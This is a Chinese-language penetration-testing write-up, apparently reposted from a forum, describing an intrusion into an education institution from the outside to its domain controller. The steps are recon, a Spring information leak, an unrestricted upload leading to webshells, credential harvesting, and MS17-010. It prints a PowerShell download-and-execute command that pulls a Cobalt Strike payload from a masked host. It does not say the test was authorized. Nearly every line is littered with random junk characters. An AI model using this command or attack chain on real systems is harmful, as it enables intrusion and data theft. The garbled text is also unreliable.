/ _: {: j# @6 `% ~; d' G3 P: ]
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路2 m( H% E! R, p' B$ L4 C
' A2 [) D6 O$ r* T
" r& W( W2 F# a9 S : ] c0 a1 ^2 k) [4 `( _0 t0 I
" Y3 @ `* E# `/ ?2 O/ m$ z( R- a
# g% O2 ]+ Q, `7 g 正文
: f; E# B' l% c* U# j- m
5 t, r# s8 Y( R7 g8 d2 U2 x6 j X) _
$ T4 x- i- P. q, W( g
% {& |9 ]; s h% I; a
1 x- v- X4 U& Y2 [# Q& q 目标:www.xxxx.com(一家教育机构) 8 ]; A/ d6 I5 x2 t' l' H. T5 b2 m7 A
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能, }8 G( }' N" X: {% ~
. M6 S: q$ o% H
" ^% \- s+ @/ L# w' g3 M. n2 J( r2 c
5 R) t, H* h5 J7 I4 f
" v4 @4 h; K7 r/ n2 F
8 m5 Z3 o9 L7 u/ ^5 ~ 进行了简单的信息搜集 ; q3 F$ I" @0 R4 l: r' C/ g
9 [- R; G4 Z: ^6 t5 N2 K ^5 C0 U; \! y$ V0 R" B* ?7 O
; _- v( O/ j5 ]: W# C: `$ R. i; x2 v: C8 @* ^7 [2 @3 q
子域名搜集
* \9 Z& b! t; F# m8 d2 M6 h# b # U4 p( L; f$ p# ^. W. i- d, t0 S8 p$ ?
8 H/ K3 H* a5 v+ y/ m, y
4 K D2 Z8 _& [
) L# O: `! X4 `) f' J5 R* H: Y+ d/ e6 n$ K$ E+ l
fofa找资产
3 Y; [5 I+ M, K; d % }5 E2 I; O2 e0 E* L
% t) a8 `5 Z* k
K$ U7 |) f8 ^# m: S! b9 ` l9 T, ?
* F0 B8 j, F; A+ [, C; s U
, w' L0 R X% J- |1 e; Y: }
; M* [% W+ i/ [/ n
- p$ a+ H7 e; v+ p 一共七个资产。去重之后只有两个。 0 S" F$ t7 ~+ r/ ]# m+ z
: S% Z0 N2 j5 ^$ Z" C2 }
# J3 T% v+ z# _, E1 d
3 o3 d# o" b r% L3 D0 f! m
0 p% V- \. H$ C. u! Q& X" k* z 目录探测7 r% q1 y, B3 G# H9 h
7 b7 U: d7 p) Z- d' _. m( t
0 F1 n# q$ l9 e& u2 m- I; }! P
( T. Q9 R8 N: K2 N' J $ ?2 a+ Z, e1 \$ Q; [6 U
W3 z4 r+ z7 ^ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
. ~2 x. g2 O+ ~5 [9 G0 _
_% \5 \5 i4 C' E, U; _: j3 i' i8 K; j5 a
& x+ a( e7 S, ]3 R# z8 \7 ?$ o( `5 E3 F) m# G
我又尝试了通过修改返回包来绕过登录界面
0 b% Z, `9 I. W
. ~* I0 z6 T5 I+ t& ?4 T5 ~, b0 H# E* `- X% h/ o
1 v, ?" ?' F5 M6 }
. x3 _, `* E' y% J5 [5 `0 F# s/ X* u# t, C1 Y0 ?, R
还是不行,尝试注入无果
1 @( q, @( }6 e. F' x/ L7 a0 c
6 ^7 F" v# G3 W' o& r
; y9 Y& m' s- S; M3 m6 k: C b 3 C6 M% O. w2 g, Q
" s" b9 l) M. ]) S4 L5 r/ T6 Y0 Y. m" @7 r5 P1 ], |7 w$ r+ N+ t# f
不过我目录探测出了一处Spring信息泄露
# f Z$ q8 l1 J O - X7 X3 k, @4 j$ w" c& k' ~
) E: e$ u. p2 b
* u% H1 v0 `) N
) i5 V9 _& K+ J( ]8 B: ~ ) m/ j+ p6 @+ j& h, \# X
0 A8 ?4 X6 P8 M& v8 O1 r3 G' |0 S4 ~9 c4 w! s0 i
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录. G' |6 n/ e! a7 W- [
6 q7 w& ~9 `; Q1 W
8 \5 E, n3 ~1 i/ B) {
8 i$ R% P) F! p" T$ N# j* `
6 V+ l: ~% o. A9 I
0 w; T) e4 ~% o; t2 x6 n3 X+ _ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
& V% {) b$ N" x* ]2 j; b* D; P
- h0 R" U! O; Z* x0 M, y/ _7 D$ X6 d0 U0 l3 V2 L
/ n: @" N" _2 G. J4 C( p v
& b2 i3 o1 E0 e# t; g/ d/ {! K9 ~$ ?9 |9 P" Y
获取有些师傅到这一步就手机抓包电脑测了。$ a( ]* c0 N0 e* f4 ]/ w) V/ j* V
" [5 [4 B% a0 L* ]: y
( N$ G! W* b( X Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。9 ~. B& r# O$ n. J; B
% V1 u- p, }& b, y" D6 y% q8 O0 `! V6 r
其中在一个公众号发现了小程序,可以进行注册。6 g0 S' r) J% V1 C$ L6 D, X1 e
* F+ X( L) l7 S* |& S8 w! Z/ p: f4 T$ r
看到了头像上传,尝试上传获取WebShell+ f! H6 ^: A0 N+ O- [
; x# S: g5 N/ ], A- U
7 h0 ]% e1 Y: G2 A8 f " s% \ P9 Z2 c' R- w+ i( i
' g, {& h) ^: k/ ?; a
' r6 t: g7 n7 j0 n1 L ] 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 {+ ^# n' w* X2 ?5 P' x( S; M
4 W+ Z% M! S% [
/ ]7 W$ v' k: l2 `% ?# R- s7 T , t. p. b. J d5 a6 \: ]
! S9 s! u- J- E9 }
# C, B8 _* t! l$ x% r% T$ Q& { 然后上了大马
- r' s" F. D0 {" S* m" I Y
! m( V) l! S8 x, A% R" L# {3 k, ~9 {
* W. g5 b6 B* a, t3 o1 k
* E' O A! K' A% j) _" D- }7 d/ |# {. ^" h" _
# v) W5 U, I6 j
6 ^7 j3 M2 r4 U8 D7 a6 ^" f1 _$ K- H, q7 Z. Q, z( @7 h4 j
通过翻找文件发现数据库账号密码
( ?8 o, @' [4 [6 v5 U) i - ]( p2 F5 j( \( m2 k
" a/ h# N% T2 }3 f K9 W& m R0 t$ {' q, ^+ _
) d3 X% w5 B/ Y5 ^" x3 R$ f1 h
% D) |9 e" [) e! J- { --内网渗透% N5 M" t' i* i0 a4 M
9 S5 j3 y/ i! C2 H6 T) x
' p4 y4 D7 h9 z L
直接通过powershell执行 cs上线& ^, s! y$ Z- b
m8 D( L2 b' J. i/ L* u! j$ G6 b3 p9 m; M8 y% \- }/ O1 Q& t
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
8 ~" d9 M3 h' ^0 g2 f7 r5 } ' p5 g" X2 Z2 ]! d" [- E3 y+ x
% ~' O* Q, D0 Q7 x: m$ P+ H
* E7 X v7 X* ?# k% O o& O5 {( q" u
, c* _& s3 D! W k! j( I7 ~/ Y8 s
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破: @! E# u+ V7 g1 l1 _; [
/ w" W" a- T6 d x0 R' K
; p) z. j# u5 Y" q - O6 `1 T# r/ o }1 f& X5 h4 B, V0 K
: p* x' }0 Q5 l0 b. C; v. t- r: r
6 {' o& f4 N) t* @
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 9 v" }! c$ r7 Q2 j5 c5 K
) Y+ H: o! ~' l: d- w 6 I! A9 P. `& k. M3 L2 b2 U* s
) c! s; a% Y6 t8 l) h
9 @, B0 F1 x7 j5 ~& F* }. t
6 O! B" G5 g! s) X
; Z) ~: x5 @/ I6 t/ n7 }+ K
9 }9 ]+ ?. n) q+ v* E% d' o
4 u, A; {) R3 J$ |0 C! k 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
8 V& D' c+ q) ]& }9 g/ V0 x! f0 X
/ @* `) R J9 g1 l3 t% G7 J0 y, L2 m2 A4 \! a8 j& j" Q; t
G) ^+ o/ Y) {5 K& S
5 R& H+ l( [/ r: B) s- P& I) X ! _6 v+ x& z/ W* o! b1 x
" {& K9 ?+ H! j3 z3 X
3 L/ M. F4 h: h2 a" ]% Z ' Y- @$ ~& b# e: [
* v5 u# Y+ n9 g3 S/ ^
: Y4 s( J, [( O( Y
% o( q5 L( n$ T$ @: s" U
, \2 d3 k! R+ ?# K, t
: d% T5 U! W! v- Q X! I/ Q- j4 W ( x' _3 Y: P8 I# G2 O# p$ v0 r
6 O- q q! b% M2 J 小结. B7 B g/ c" y2 L: `7 _0 ?+ w& n
# T4 d _6 Z) f5 \4 ~5 ]5 ~+ q( `6 P$ c
6 B v" i+ U6 ~; s8 D- o) q+ k
% m% l2 T3 d# {4 u8 S- P2 L
, a" x1 v; x. o. {. M# h/ L: A 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
' O! b8 @0 }1 v5 H, K8 L9 T' M 3 ~% h: a5 {8 ~$ Z7 I; X. p7 C! m3 `
- F. z7 j6 p5 `& z% `
; E6 T3 i" c9 u0 u% w) ?
0 m1 V/ A7 ^4 h: Z; ~4 M% m1 T; ]0 U- j; R5 R) R
- + ]6 g# |" b) q! M' H6 ]: O( p
* p6 g* I7 `$ G) n
: I. z! u3 t: ~8 h* z" r
- ! p: Z) k i1 B- Q; f
2 I5 G1 h* D+ w4 [* r9 k- `
9 @! M D) i4 R$ i+ R6 e# ?
2 J5 g7 O- Z+ W4 K$ e
3 l& X, R9 ^5 s3 V, Z 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html1 v, V" u8 o' p% y- z1 x
% ^. N3 J! f5 }4 H! J! ]+ y+ n- }6 q1 _
1 d( l. e1 I K" O# N3 \, R
. l# t/ F+ Y2 O4 Z1 B$ G |